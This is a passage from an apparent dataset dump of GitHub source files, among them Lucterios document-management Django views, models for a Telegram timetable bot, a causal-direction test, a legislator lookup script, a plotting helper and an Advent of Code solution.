FolderAddModify.get_action(\"\", \"images/add.png\"), close=CLOSE_NO)\n folder.add_action(self.request, self.return_action(\"\", \"images/delete.png\"), close=CLOSE_NO, unique=SELECT_SINGLE)\n self.add_component(folder)\n return folder_obj\n\n def add_document(self):\n last_row = self.get_max_row() + 5\n lbl = XferCompLabelForm('sep1')\n lbl.set_location(0, last_row, 6)\n lbl.set_value(\"{[center]}{[hr/]}{[/center]}\")\n self.add_component(lbl)\n lbl = XferCompLabelForm('sep2')\n lbl.set_location(0, last_row + 1, 3)\n lbl.set_value_as_infocenter(_(\"Add document\"))\n self.add_component(lbl)\n\n self.fill_from_model(0, last_row + 3, False)\n self.remove_component('parent')\n 
self.get_components('filename').colspan = 3\n self.get_components('description').colspan = 3\n\n btn_doc = XferCompButton('adddoc')\n btn_doc.set_location(3, last_row + 4)\n btn_doc.set_is_mini(True)\n btn_doc.set_action(self.request, DocumentAddModify.get_action(TITLE_ADD, 'images/add.png'),\n params={'parent': self.current_folder, 'SAVE': 'YES'}, close=CLOSE_NO)\n self.add_component(btn_doc)\n\n\n@MenuManage.describ('documents.change_document', FORMTYPE_NOMODAL, 'documents.actions', _('To find a document following a set of criteria.'))\nclass DocumentSearch(XferSavedCriteriaSearchEditor):\n caption = _(\"Document search\")\n icon = \"documentFind.png\"\n model = DocumentContainer\n field_id = 'document'\n mode_select = SELECT_SINGLE\n select_class = None\n\n def get_text_search(self):\n criteria_desc = XferSavedCriteriaSearchEditor.get_text_search(self)\n if notfree_mode_connect() and not self.request.user.is_superuser:\n if self.filter is None:\n self.filter = Q()\n self.filter = self.filter & (Q(parent=None) | Q(parent__viewer__in=self.request.user.groups.all()))\n return criteria_desc\n\n def fillresponse(self):\n XferSearchEditor.fillresponse(self)\n grid = self.get_components(self.field_id)\n grid.actions = []\n grid.add_action(self.request, DocumentShow.get_action(TITLE_EDIT, \"images/show.png\"), close=CLOSE_NO, unique=SELECT_SINGLE)\n if self.select_class is not None:\n grid.add_action(self.request, self.select_class.get_action(_(\"Select\"), \"images/ok.png\"), close=CLOSE_YES, unique=self.mode_select, pos_act=0)\n\n\n@ActionsManage.affect_show(_('delete shared link'), \"images/permissions.png\", condition=lambda xfer: xfer.item.sharekey is not None)\n@ActionsManage.affect_show(_('create shared link'), \"images/permissions.png\", condition=lambda xfer: xfer.item.sharekey is None)\n@MenuManage.describ('documents.add_document')\nclass DocumentChangeShared(XferContainerAcknowledge):\n icon = \"document.png\"\n model = DocumentContainer\n field_id = 'document'\n\n def fillresponse(self):\n self.item.change_sharekey(self.item.sharekey is not None)\n self.item.save()\n\n\n@MenuManage.describ('')\nclass DownloadFile(XferContainerAcknowledge):\n icon = \"document.png\"\n model = DocumentContainer\n field_id = 'document'\n caption = _(\"Download document\")\n methods_allowed = ('GET', 'PUT')\n\n def request_handling(self, request, *args, **kwargs):\n from django.http.response import StreamingHttpResponse, HttpResponse\n getLogger(\"lucterios.documents\").debug(\">> DownloadFile get %s [%s]\", request.path, request.user)\n try:\n self._initialize(request, *args, **kwargs)\n fileid = self.getparam('fileid', 0)\n shared = self.getparam('shared', '')\n filename = self.getparam('filename', '')\n try:\n if fileid == 0:\n doc = DocumentContainer.objects.get(name=filename, sharekey=shared)\n else:\n doc = DocumentContainer.objects.get(id=fileid, name=filename)\n response = StreamingHttpResponse(doc.content, content_type='application/octet-stream')\n response['Content-Disposition'] = 'attachment; filename=%s' % doc.name\n if hasattr(request, 'session') and hasattr(request.session, 'accessed'):\n request.session.accessed = False\n if hasattr(request, 'session') and hasattr(request.session, 'modified'):\n request.session.modified = False\n except DocumentContainer.DoesNotExist:\n getLogger('lucterios.documents.DownloadFile').exception(\"downloadFile\")\n response = HttpResponse(_(\"File not found !\"))\n return response\n finally:\n getLogger(\"lucterios.documents\").debug(\"<< DownloadFile get %s 
[%s]\", request.path, request.user)\n\n\n@MenuManage.describ('')\nclass UploadFile(XferContainerAcknowledge):\n icon = \"document.png\"\n field_id = 'document'\n caption = \"document\"\n\n def request_handling(self, request, *args, **kwargs):\n getLogger(\"lucterios.documents\").debug(\">> UploadFile get %s [%s]\", request.path, request.user)\n try:\n from lucterios.documents.doc_editors import OnlyOfficeEditor\n from django.http.response import JsonResponse\n self._initialize(request, *args, **kwargs)\n doc = DocumentContainer.objects.get(id=self.getparam('fileid', 0), name=self.getparam('filename', ''))\n editor = OnlyOfficeEditor(get_url_from_request(request), doc)\n responsejson = editor.uploadFile(request.body)\n return JsonResponse(responsejson, json_dumps_params={'indent': 3})\n finally:\n getLogger(\"lucterios.documents\").debug(\"<< UploadFile get %s [%s]\", request.path, request.user)\n\n\ndef file_check_permission(file_id, request):\n from django.http.response import HttpResponse, HttpResponseNotFound\n can_write = False\n user = None\n try:\n doc = DocumentContainer.objects.get(id=file_id)\n except (ValueError, ObjectDoesNotExist):\n return HttpResponseNotFound(f\"File id {file_id} no found\".encode())\n if ('access_token' not in request.GET) or (request.GET['access_token'].count('-') != 1):\n return HttpResponse(b\"token invalid: no token\", status=401)\n user_id, date_timestamp = request.GET['access_token'].split('-')\n user_id = int(user_id)\n if str(doc.date_modification.timestamp()) != date_timestamp:\n return HttpResponse(b\"token invalid: timestamp\", status=401)\n if user_id == 0:\n if notfree_mode_connect():\n return HttpResponse(b\"token invalid: unsecure\", status=401)\n else:\n can_write = True\n else:\n try:\n user = LucteriosUser.objects.get(id=user_id)\n except ObjectDoesNotExist:\n return HttpResponse(b\"token invalid: user unknown\", status=401)\n if doc.parent.cannot_view(user):\n return HttpResponse(b\"token invalid: no permission\", status=401)\n can_write = not doc.parent.is_readonly(user)\n return doc, can_write, user\n\n\n@require_GET\ndef check_file_info(request, file_id):\n from django.http.response import JsonResponse, HttpResponseBase, HttpResponseServerError\n getLogger(\"lucterios.documents\").debug(f\"Check file: file id: {file_id}\")\n try:\n perm_res = file_check_permission(file_id, request)\n if isinstance(perm_res, HttpResponseBase):\n return perm_res\n doc, can_write, user = perm_res\n res = {\n 'BaseFileName': doc.name,\n 'Size': len(doc.content.read()),\n 'UserId': str(user.id) if user is not None else '0',\n 'OwnerId': str(doc.creator.id) if doc.creator is not None else '0',\n 'UserCanWrite': can_write,\n 'UserFriendlyName': str(user) if user is not None else '---',\n 'HidePrintOption': False,\n 'DisablePrint': False,\n 'HideSaveOption': False,\n 'HideExportOption': True,\n 'DisableExport': True,\n 'DisableCopy': True,\n 'EnableOwnerTermination': False,\n 'LastModifiedTime': doc.date_modification.isoformat(),\n 'IsUserLocked': False,\n 'IsUserRestricted': False,\n }\n return JsonResponse(res)\n except Exception:\n getLogger(\"lucterios.documents\").exception(\"check_file_info failure!!!\")\n return HttpResponseServerError()\n\n\nclass FileContentView(View):\n\n @staticmethod\n def get(request, file_id):\n from django.http.response import HttpResponse, HttpResponseBase, HttpResponseServerError\n getLogger(\"lucterios.documents\").info(f\"GetFile: file id: {file_id}, access token: {request.GET['access_token']}\")\n try:\n perm_res = 
file_check_permission(file_id, request)\n if isinstance(perm_res, HttpResponseBase):\n return perm_res\n doc, _can_write, _user_id = perm_res\n return HttpResponse(doc.content.read())\n except Exception:\n getLogger(\"lucterios.documents\").exception(\"FileContentView get failure!!!\")\n return HttpResponseServerError()\n\n @staticmethod\n def post(request, file_id):\n from django.http.response import HttpResponse, HttpResponseBase, HttpResponseNotFound, HttpResponseServerError\n getLogger(\"lucterios.documents\").info(f\"PutFile: file id: {file_id}, access token: {request.GET['access_token']}\")\n if not request.body:\n return HttpResponseNotFound(b'Not possible to get the file content.')\n try:\n perm_res = file_check_permission(file_id, request)\n if isinstance(perm_res, HttpResponseBase):\n return perm_res\n doc, _can_write, _user_id = perm_res\n doc.content = request.read()\n return HttpResponse() # status 200\n except Exception:\n getLogger(\"lucterios.documents\").exception(\"FileContentView post failure!!!\")\n return HttpResponseServerError()\n\n\n@signal_and_lock.Signal.decorate('summary')\ndef summary_documents(xfer):\n if not hasattr(xfer, 'add_component'):\n return WrapAction.is_permission(xfer, 'documents.change_document')\n elif WrapAction.is_permission(xfer.request, 'documents.change_document'):\n row = xfer.get_max_row() + 1\n lab = XferCompLabelForm('documenttitle')\n lab.set_value_as_infocenter(_('Document management'))\n lab.set_location(0, row, 4)\n xfer.add_component(lab)\n filter_result = Q()\n if notfree_mode_connect():\n filter_result = filter_result & (Q(parent=None) | Q(parent__viewer__in=xfer.request.user.groups.all() if xfer.request.user.id is not None else []))\n nb_doc = len(DocumentContainer.objects.filter(*[filter_result]))\n lbl_doc = XferCompLabelForm('lbl_nbdocument')\n lbl_doc.set_location(0, row + 1, 4)\n if nb_doc == 0:\n lbl_doc.set_value_center(_(\"no file currently available\"))\n elif nb_doc == 1:\n lbl_doc.set_value_center(_(\"one file currently available\"))\n else:\n lbl_doc.set_value_center(_(\"%d files currently available\") % nb_doc)\n xfer.add_component(lbl_doc)\n lab = XferCompLabelForm('documentend')\n lab.set_value_center('{[hr/]}')\n lab.set_location(0, row + 2, 4)\n xfer.add_component(lab)\n return True\n else:\n return False\n\n\n@signal_and_lock.Signal.decorate('get_url_patterns')\ndef get_url_patterns(url_patterns):\n from django.conf.urls import url\n url_patterns.append(url(r'^lucterios.documents/files/(.*)/contents', FileContentView.as_view()))\n url_patterns.append(url(r'^lucterios.documents/files/(.*)', check_file_info))\n return True\n\n\n@signal_and_lock.Signal.decorate('conf_wizard')\ndef conf_wizard_document(wizard_ident, xfer):\n if isinstance(wizard_ident, list) and (xfer is None):\n wizard_ident.append((\"document_params\", 55))\n elif (xfer is not None) and (wizard_ident == \"document_params\"):\n xfer.add_title(_(\"Lucterios documents\"), _(\"Parameters\"))\n lbl = XferCompLabelForm(\"nb_folder\")\n lbl.set_location(1, xfer.get_max_row() + 1)\n lbl.set_value(TEXT_TOTAL_NUMBER % {'name': FolderContainer._meta.verbose_name_plural, 'count': len(FolderContainer.objects.all())})\n xfer.add_component(lbl)\n lbl = XferCompLabelForm(\"nb_doc\")\n lbl.set_location(1, xfer.get_max_row() + 1)\n lbl.set_value(TEXT_TOTAL_NUMBER % {'name': DocumentContainer._meta.verbose_name_plural, 'count': len(DocumentContainer.objects.all())})\n xfer.add_component(lbl)\n btn = XferCompButton(\"btnconf\")\n btn.set_location(4, xfer.get_max_row() 
- 1, 1, 2)\n        btn.set_action(xfer.request, FolderList.get_action(TITLE_MODIFY, \"images/edit.png\"), close=CLOSE_NO)\n        xfer.add_component(btn)\n","repo_name":"Lucterios2/documents","sub_path":"lucterios/documents/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":30466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1090432623","text":"from django.db import models\nfrom multiselectfield import MultiSelectField\nfrom django import forms\n\nTYPES = (\n    ('lec', 'Лекция'),\n    ('prac', 'Практика'),\n    ('seminar', 'Семинар'),\n    ('lab', 'Лаб.')\n)\n\nLESSON_NUMBERS = (\n    (\"1\", \"1-ая пара\"),\n    (\"2\", \"2-ая пара\"),\n    (\"3\", \"3-яя пара\"),\n    (\"4\", \"4-ая пара\"),\n    (\"5\", \"5-ая пара\"),\n    (\"6\", \"6-ая пара\"),\n    (\"7\", \"7-ая пара\"),\n)\n\n\nclass TimeBasedModels(models.Model):\n    class Meta:\n        abstract = True\n\n    created_at = models.DateTimeField(auto_now_add=True)\n    updated_at = models.DateTimeField(auto_now=True)\n\n\nclass User(TimeBasedModels):\n    class Meta:\n        verbose_name = \"Пользователь\"\n        verbose_name_plural = \"Пользователи\"\n\n    id = models.AutoField(primary_key=True)\n    user_id = models.BigIntegerField(unique=True, default=1, verbose_name=\"ID пользователя Telegram\")\n    name = models.CharField(max_length=100, verbose_name=\"Имя пользователя\", blank=True, null=True)\n    username = models.CharField(max_length=100, verbose_name=\"Username Telegram\", blank=True, null=True)\n\n    def __str__(self):\n        return f\"№{self.id} {self.user_id} - {self.name}\"\n\n\nclass Subject(TimeBasedModels):\n    class Meta:\n        verbose_name = \"Предмет\"\n        verbose_name_plural = \"Предметы\"\n\n    id = models.AutoField(primary_key=True)\n    name = models.CharField(max_length=100, verbose_name=\"Название предмета\")\n\n    def __str__(self):\n        return f\"№{self.id} - {self.name}\"\n\n\nclass ZoomLink(TimeBasedModels):\n    class Meta:\n        verbose_name = \"ZOOM ссылка\"\n        verbose_name_plural = \"ZOOM ссылки\"\n\n    id = models.AutoField(primary_key=True)\n    subject = models.ForeignKey(Subject, verbose_name=\"Предмет\", on_delete=models.CASCADE)\n    type = MultiSelectField(choices=TYPES, max_choices=2, verbose_name=\"Тип пары (max_choices = 2)\")\n    url = models.URLField(verbose_name=\"Ссылка (optional)\", blank=True, null=True)\n    code = models.CharField(max_length=100, verbose_name=\"Код\")\n    password = models.CharField(max_length=100, verbose_name=\"Пароль (optional)\", blank=True, null=True)\n\n    def __str__(self):\n        return f\"№{self.id} - {self.subject} ({self.type})\"\n\n\nclass Teacher(TimeBasedModels):\n    class Meta:\n        verbose_name = \"Преподаватель\"\n        verbose_name_plural = \"Преподаватели\"\n\n    id = models.AutoField(primary_key=True)\n    last_name = models.CharField(max_length=100, verbose_name=\"Фамилия\")\n    first_name = models.CharField(max_length=100, verbose_name=\"Имя\")\n    middle_name = models.CharField(max_length=100, verbose_name=\"Отчество (optional)\", blank=True, null=True)\n    subject = models.ForeignKey(Subject, verbose_name=\"Предмет\", on_delete=models.CASCADE)\n    type = MultiSelectField(choices=TYPES, max_choices=2, verbose_name=\"Тип пары (max_choices = 2)\")\n    email = models.EmailField(verbose_name=\"Email адрес\", blank=True, null=True)\n\n    def __str__(self):\n        return f\"№{self.id} - {self.first_name} {self.middle_name} ({self.subject} - {self.type})\"\n\n\nclass Weekday(TimeBasedModels):\n    class Meta:\n        verbose_name = \"День недели\"\n        verbose_name_plural = \"Дни недели\"\n\n    id = models.AutoField(primary_key=True)\n    code = 
models.CharField(max_length=3, verbose_name=\"Код\", default=1)\n    name = models.CharField(max_length=100, verbose_name=\"Название\")\n\n    def __str__(self):\n        return f\"№{self.id} - {self.name}\"\n\n\nclass Timetable(TimeBasedModels):\n    class Meta:\n        verbose_name = \"Расписание\"\n        verbose_name_plural = \"Расписание\"\n        unique_together = ['weekday', 'lesson_number', 'even_week', 'odd_week']\n\n    id = models.AutoField(primary_key=True)\n    weekday = models.ForeignKey(Weekday, verbose_name=\"День недели\", on_delete=models.CASCADE)\n    lesson_number = MultiSelectField(choices=LESSON_NUMBERS, max_choices=1, verbose_name=\"Номер пары\")\n    subject = models.ForeignKey(Subject, verbose_name=\"Предмет\", on_delete=models.CASCADE)\n    audience_number = models.CharField(max_length=100, verbose_name=\"Номер аудитории (optional)\",\n                                       blank=True, null=True, default=\"\")\n    is_remotely = models.BooleanField(verbose_name=\"Дистанционно\", default=False)\n    type = MultiSelectField(choices=TYPES, max_choices=1, verbose_name=\"Тип пары\", min_choices=0,\n                            default=\"\", blank=True, null=True)\n    even_week = models.BooleanField(verbose_name=\"Четная неделя\")\n    odd_week = models.BooleanField(verbose_name=\"Нечетная неделя\")\n\n    def __str__(self):\n        return f\"№{self.id} - {self.weekday} {self.subject} (Пара №{self.lesson_number})\"\n\n\nclass Homework(TimeBasedModels):\n    class Meta:\n        verbose_name = 'Домашнее задание'\n        verbose_name_plural = 'Домашние задания'\n\n    id = models.AutoField(primary_key=True)\n    subject = models.ForeignKey(Subject, verbose_name=\"Предмет\", on_delete=models.CASCADE)\n    date = models.DateField(verbose_name=\"Дедлайн\")\n    description = models.TextField(verbose_name=\"Описание задания\")\n    photo = models.ImageField(verbose_name=\"Фото\", null=True, blank=True)\n    file = models.FileField(verbose_name=\"Файл\", null=True, blank=True)\n\n    def __str__(self):\n        return f\"№{self.id} - {self.subject} {self.description} ({self.date})\"\n","repo_name":"KStepanI1/web-leti-0372","sub_path":"server/django_project/shelp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10334173779","text":"class WorkSearch(object):\n\tdef from_json(self, json_obj):\n\t\tself.id = json_obj[\"id\"]\n\t\tself.title = json_obj[\"title\"]\n\t\tself.summary = json_obj[\"summary\"]\n\t\tself.notes = None if json_obj[\"notes\"] == \"null\" else json_obj[\"notes\"]\n\t\tself.is_complete = self.convert_bool(json_obj[\"is_complete\"])\n\t\tself.process_status = None if json_obj[\"process_status\"] == \"null\" else json_obj[\"process_status\"]\n\t\tself.cover_url = None if json_obj[\"cover_url\"] == \"null\" else json_obj[\"cover_url\"]\n\t\tself.cover_alt_text = None if json_obj[\"cover_alt_text\"] == \"null\" else json_obj[\"cover_alt_text\"]\n\t\tself.epub_id = None if json_obj[\"epub_id\"] == \"null\" else json_obj[\"epub_id\"]\n\t\tself.zip_id = None if json_obj[\"zip_id\"] == \"null\" else json_obj[\"zip_id\"]\n\t\tself.anon_comments_permitted = self.convert_bool(json_obj[\"anon_comments_permitted\"])\n\t\tself.comments_permitted = self.convert_bool(json_obj[\"comments_permitted\"])\n\t\tself.word_count = json_obj[\"word_count\"]\n\t\tself.audio_length = json_obj[\"audio_length\"]\n\t\tself.user_id = json_obj[\"user_id\"]\n\t\tself.work_type = None if json_obj[\"work_type\"] == \"null\" else json_obj[\"work_type\"]\n\t\tself.user = json_obj[\"user\"]\n\n\tdef convert_bool(self, string_bool):\n\t\treturn 
False if string_bool == \"false\" else True\n\n\nclass SearchObject(object):\n\tdef with_term(self, term, pagination=None, mode=('all', 'all'), order_by='-updated_on'):\n\t\treturn_obj = {}\n\t\twork_search = {}\n\t\twork_search[\"term\"] = term\n\t\twork_search[\"include_mode\"] = mode[0]\n\t\twork_search[\"exclude_mode\"] = mode[1]\n\t\twork_search[\"page\"] = 1\n\t\twork_search[\"order_by\"] = order_by\n\t\twork_search[\"include_filter\"] = {'tags': [], 'attributes': []}\n\t\twork_search[\"exclude_filter\"] = {'tags': [], 'attributes': []}\n\t\treturn_obj[\"work_search\"] = work_search\n\n\t\tbookmark_search = {}\n\t\tbookmark_search[\"term\"] = term\n\t\tbookmark_search[\"page\"] = 1\n\t\tbookmark_search[\"include_mode\"] = mode[0]\n\t\tbookmark_search[\"exclude_mode\"] = mode[1]\n\t\tbookmark_search[\"order_by\"] = order_by\n\t\tbookmark_search[\"include_filter\"] = {'tags': [], 'attributes': []}\n\t\tbookmark_search[\"exclude_filter\"] = {'tags': [], 'attributes': []}\n\t\treturn_obj[\"bookmark_search\"] = bookmark_search\n\n\t\tcollection_search = {}\n\t\tcollection_search[\"term\"] = term\n\t\tcollection_search[\"include_mode\"] = mode[0]\n\t\tcollection_search[\"exclude_mode\"] = mode[1]\n\t\tcollection_search[\"page\"] = 1\n\t\tcollection_search[\"order_by\"] = order_by\n\t\tcollection_search[\"include_filter\"] = {'tags': [], 'attributes': []}\n\t\tcollection_search[\"exclude_filter\"] = {'tags': [], 'attributes': []}\n\t\treturn_obj[\"collection_search\"] = collection_search\n\n\t\tuser_search = {}\n\t\tuser_search[\"term\"] = term\n\t\tuser_search[\"page\"] = 1\n\t\tuser_search[\"filter\"] = {}\n\t\treturn_obj[\"user_search\"] = user_search\n\n\t\ttag_search = {}\n\t\ttag_search[\"term\"] = term\n\t\ttag_search[\"include_mode\"] = mode[0]\n\t\ttag_search[\"exclude_mode\"] = mode[1]\n\t\ttag_search[\"page\"] = 1\n\t\ttag_search[\"order_by\"] = order_by\n\t\ttag_search[\"include_filter\"] = {'tag_type': [], 'text': []}\n\t\ttag_search[\"exclude_filter\"] = {'tag_type': [], 'text': []}\n\t\treturn_obj[\"tag_search\"] = tag_search\n\n\t\tif pagination:\n\t\t\tobj = pagination['obj'].lower()\n\t\t\tif obj == 'work':\n\t\t\t\treturn_obj['work_search']['page'] = pagination['page']\n\t\t\telif obj == 'bookmark':\n\t\t\t\treturn_obj['bookmark_search']['page'] = pagination['page']\n\t\t\telif obj == 'tag':\n\t\t\t\treturn_obj['tag_search']['page'] = pagination['page']\n\t\t\telif obj == 'bookmarkcollection':\n\t\t\t\treturn_obj['collection_search']['page'] = pagination['page']\n\n\t\treturn return_obj\n\n\tdef get_object_type(self, filter_term):\n\t\tif 'audio' in filter_term:\n\t\t\treturn 'work'\n\t\telif 'tag_type' in filter_term:\n\t\t\treturn 'tag'\n\t\telif 'attribute_type' in filter_term:\n\t\t\treturn 'attribute'\n\t\telif 'work_type' in filter_term:\n\t\t\treturn 'work'\n\t\telif 'word_count' in filter_term:\n\t\t\treturn 'work'\n\t\telif 'complete' in filter_term:\n\t\t\treturn 'work'\n\t\telif 'rating' in filter_term:\n\t\t\treturn 'bookmark'\n","repo_name":"c-e-p/ourchive","sub_path":"ourchive_app/frontend/search_models.py","file_name":"search_models.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"15402765838","text":"import numpy as np\nimport math\nfrom because.probability.standardiz import standardize\nfrom sklearn import linear_model\nfrom sklearn.gaussian_process.kernels import RBF\nfrom sklearn.gaussian_process import GaussianProcessRegressor\nfrom sklearn import 
svm\nfrom because.probability.rcot.RCoT import RCoT\nfrom sklearn.kernel_ridge import KernelRidge\nfrom because.probability.rff.rffridge import RFFRidgeRegression\nfrom because.probability.rff.rffgpr import RFFGaussianProcessRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.neighbors import KNeighborsClassifier\n\ndef balance(A, B):\n    newA = []\n    newB = []\n    bdict = {}\n    N = A.shape[0]\n    bvals = set(B)\n    card = len(bvals)\n    if card > 2:\n        return (A, B, False)\n    # NOTE: this early return short-circuits the re-balancing code below, leaving it unreachable\n    return (A, B, True)\n    for v in bvals:\n        bdict[v] = 0\n    for v in B:\n        bdict[v] += 1\n    proportions = {}\n    maxProp = 0\n    for v in bvals:\n        prop = bdict[v] / N\n        if prop > maxProp:\n            maxProp = prop\n        proportions[v] = bdict[v] / N\n    for i in range(N):\n        bv = B[i]\n        av = A[i]\n        for j in range(int(round(maxProp / proportions[bv], 0))):\n            newA.append(av)\n            newB.append(bv)\n    return (np.array(newA), np.array(newB), True)\n\ndef test_direction(rvA, rvB, power=1, N_train=2000, sensitivity=None):\n    \"\"\" When the power parameter is less than 1,\n    test the causal direction between variables A and B\n    using one of the LiNGAM or GeNGAM pairwise algorithms.\n\n    When power is 1 or greater, use a non-linear method\n    to test the causal direction. N_train determines at most\n    how many samples would be used to train the non-linear\n    model. Currently the test uses a KNN algorithm.\n\n    Returns a number R. A positive R indicates that the\n    causal path runs from A toward B. A negative value\n    indicates a causal path from B towards A. Values\n    close to zero (e.g. +/- 10**-5) mean that the causal\n    direction could not be determined.\n    \"\"\"\n    if power < 1:\n        # If power = 0, use lingam (i.e. linear method)\n        # Pairwise Lingam Algorithm (Hyperbolic Tangent (HT) variant)\n        cum = 0\n        s1 = rvA\n        s2 = rvB\n        for i in range(len(s1)):\n            v1 = s1[i]\n            v2 = s2[i]\n            cumulant = v1 * math.tanh(v2) - v2 * math.tanh(v1)\n            cum += cumulant\n        avg = cum / float(len(s1))\n        cc = np.corrcoef([s1, s2])\n        rho = cc[1, 0]\n        R = math.tanh(rho * avg * 100)\n        return R\n    else:\n        # We found that averaging multiple small samples (e.g. 
2K)\n        # is far more accurate and faster than using large or full\n        # samples.\n        import random\n        #newSeed = random.randint(1,1000000)\n        #np.random.seed(newSeed)\n        sampSize = N_train\n        cum = 0.0\n        N = len(rvA)\n        samples = 3 + int(math.log(power, 10) * 20)\n        if N < sampSize * 2:\n            sampSize = int(N / 2)\n        rvA_a = np.array(rvA)\n        rvB_a = np.array(rvB)\n        for i in range(samples):\n            if sampSize < N:\n                inds = np.random.choice(N, size=sampSize, replace=False)\n                sA = rvA_a[inds]\n                sB = rvB_a[inds]\n            else:\n                sA = rvA_a\n                sB = rvB_a\n            #AtoB = non_linear_direct_test(sA, sB)\n            #BtoA = non_linear_direct_test(sB, sA)\n            try:\n                # pass\n                AtoB = non_linear_direct_test(sA, sB)\n                BtoA = non_linear_direct_test(sB, sA)\n            except Exception:\n                continue\n            if BtoA == 0 and AtoB == 0:\n                continue\n            #print('AtoB, BtoA = ', AtoB, BtoA)\n            R0 = (BtoA - AtoB) / (BtoA + AtoB)\n            Rsamp = math.tanh(R0)\n            cum += Rsamp\n        R = cum / samples\n        #print('AtoB, BtoA, R = ', AtoB, BtoA, R, R0)\n        return R\n\ndef non_linear_direct_test(A, B):\n    A, B, isCat = balance(A,B)\n    s1 = A.reshape(-1, 1)\n    s2 = B\n\n    N = s1.shape[0]\n\n    #reg = RFFRidgeRegression(rff_dim=100)\n    if isCat and False:  # NOTE: 'and False' disables the classifier branch; the regressor below is always used\n        reg = KNeighborsClassifier(n_neighbors=10)\n        s2 = np.int_(s2)\n    else:\n        reg = KNeighborsRegressor(n_neighbors=10)\n\n    reg.fit(s1, s2)\n\n    preds = reg.predict(s1)\n    residual = s2 - preds\n    #print('N = ', N)\n    #for i in range(10):\n    #    print('s1, s2, preds = ', s1[i], s2[i], preds[i])\n\n    num_f2 = 8\n    #(p, Sta) = RCoT(A, residual, num_f2=num_f2, seed = 1)\n    (p, Sta) = RCoT(A, residual, num_f2=num_f2)\n    return math.log(Sta / (num_f2 ** 2) + 1)\n","repo_name":"RogerDev/Because","sub_path":"because/probability/direction.py","file_name":"direction.py","file_ext":"py","file_size_in_byte":4714,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"27233622650","text":"import pandas as pd\nfrom xls_io import XLSIO\nfrom get_legislators_from_address import get_legislators_from_address\n\ndef populate_sheet_with_legislators(name, address_column_names):\n\n    my_XLSIO = XLSIO(name)\n    worksheet = my_XLSIO.load()\n\n    # Combine columns into full address column\n    worksheet['Combined address'] = ''\n    for column_name in address_column_names:\n        worksheet['Combined address'] = worksheet['Combined address'] \\\n            + worksheet[column_name].astype(str)\n\n    # Get size of sheet\n    ws_size = worksheet['Combined address'].shape[0]\n\n    # Define columns to build from requested info\n    senators_names = [None] * ws_size\n\n    # Run each address and get legislators\n    for index, row in worksheet.iterrows():\n        legislators = get_legislators_from_address(row['Combined address'])\n\n        # Skip if no legislators found\n        if legislators is None:\n            continue\n\n        else:\n            # Print some progress\n            if index % 5 == 0:\n                print(\"Done with %i rows\" % index)\n\n            # Extract senator names\n            senators_names[index] = list(\n                filter(lambda legislator: legislator['chamber'] == 'upper',\n                    legislators))[0]['full_name']\n\n    # Set extracted lists to new columns\n    worksheet['Senator name'] = senators_names\n\n    my_XLSIO.save()\n\nif __name__ == \"__main__\":\n    populate_sheet_with_legislators(\n        name = '../files/renter_deduction_bill',\n        address_column_names = ['Street address', 'City'])\n\n    # populate_sheet_with_legislators(\n    #     name = '../files/non_member',\n    #     address_column_names = ['Street Address', 'Town', 
'Zip'])\n","repo_name":"hdavidzhu/mahc","sub_path":"utilities/populate_sheet_with_legislators.py","file_name":"populate_sheet_with_legislators.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4340794420","text":"import matplotlib.pyplot as plt\n\n\ndef show_sines(data, targets, skip):\n\n fig, axes = plt.subplots(1, 4, figsize=(9, 3))\n plt.subplots_adjust(0.05, 0.1, 0.95, 0.9, 0.3, 0.1)\n\n for ax, x, y in zip(axes, data, targets):\n ax.plot(x)\n ax.scatter(len(x) + skip, y)\n ax.set_ylim(-2.1, 2.1)\n\n fig.show()\n","repo_name":"vikiival/neural_networks_at_fiit","sub_path":"week_8/backstage/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24455699822","text":"#!/usr/bin/env python3\n\nimport re\nfrom collections import namedtuple\nfrom os.path import dirname\nfrom typing import FrozenSet, List, Set\n\nfrom aocd import get_data\n\nDAY = int(re.sub(r'[^0-9]', \"\", dirname(__file__).split('/')[-1]))\nYEAR = int(re.sub(r'[^0-9]', \"\", dirname(__file__).split('/')[-2]))\nDATA: str = get_data(day=DAY, year=YEAR)\n\n# DATA = \"2,2,2\\n1,2,2\\n3,2,2\\n2,1,2\\n2,3,2\\n2,2,1\\n2,2,3\\n2,2,4\\n2,2,6\\n1,2,5\\n3,2,5\\n2,1,5\\n2,3,5\"\n\nlines = DATA.splitlines()\n\nCube = namedtuple(\"Cube\", \"x y z\")\n\ncubes: FrozenSet[Cube] = frozenset([Cube(*map(int, l.split(\",\"))) for l in lines])\n\n\ndef sides(c: Cube) -> FrozenSet[Cube]:\n return frozenset(\n [\n Cube(c.x + 1, c.y, c.z),\n Cube(c.x - 1, c.y, c.z),\n Cube(c.x, c.y + 1, c.z),\n Cube(c.x, c.y - 1, c.z),\n Cube(c.x, c.y, c.z + 1),\n Cube(c.x, c.y, c.z - 1),\n ]\n )\n\n\ndef count_neighbors(cubes: FrozenSet[Cube], c: Cube) -> int:\n return sum(1 for n in sides(c) if n in cubes)\n\n\nprint(f\"part 1:\\t{sum(6 - count_neighbors(cubes, c) for c in cubes)}\")\n\nseen: Set[Cube] = set()\nq: List[Cube] = [Cube(-1, -1, -1)]\n\nwhile q:\n cur = q.pop()\n q += [s for s in (sides(cur) - cubes - seen) if all(-1 <= c <= 25 for c in s)]\n seen |= {cur}\n\nprint(f\"part 2:\\t{sum((s in seen) for c in cubes for s in sides(c))}\")\n","repo_name":"Alexdelia/puzzle","sub_path":"Advent_of_Code/y2022/d18/p.py","file_name":"p.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} 